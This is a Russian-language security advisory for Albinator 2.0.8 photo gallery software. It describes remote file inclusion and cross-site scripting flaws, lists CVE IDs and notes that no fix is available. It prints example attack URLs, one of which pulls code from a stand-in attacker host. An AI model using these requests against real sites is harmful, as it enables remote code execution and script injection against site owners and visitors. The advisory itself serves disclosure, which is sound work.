Дата публикации: | 06.05.2006 |
Дата изменения: | 14.03.2009 |
Всего просмотров: | 2484 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2006-2181 CVE-2006-2182 CVE-2006-2215 |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Albinator 2.x |
Уязвимые версии: Albinator 2.0.8, возможно более ранние версии.
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "Config_rootdir" в сценариях "eday.php", "eshow.php" и "forgot.php", и параметре "dirpath" в сценариях "gc.php" и "integration.inc.php". Пример: http://victim/eshow.php?Config_rootdir=http://evilcode.php 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "cid" в сценарии "dlisting.php" и параметре "preloadSlideShow" в сценарии "showpic.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: /dlisting.php?cid=1[XSS] /showpic.php?aid=21&uuid=175&pid=172&slide_show= URL производителя: www.albinator.com Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | albinator <= 2.0.8 Remote File Inclusion & XSS vuln |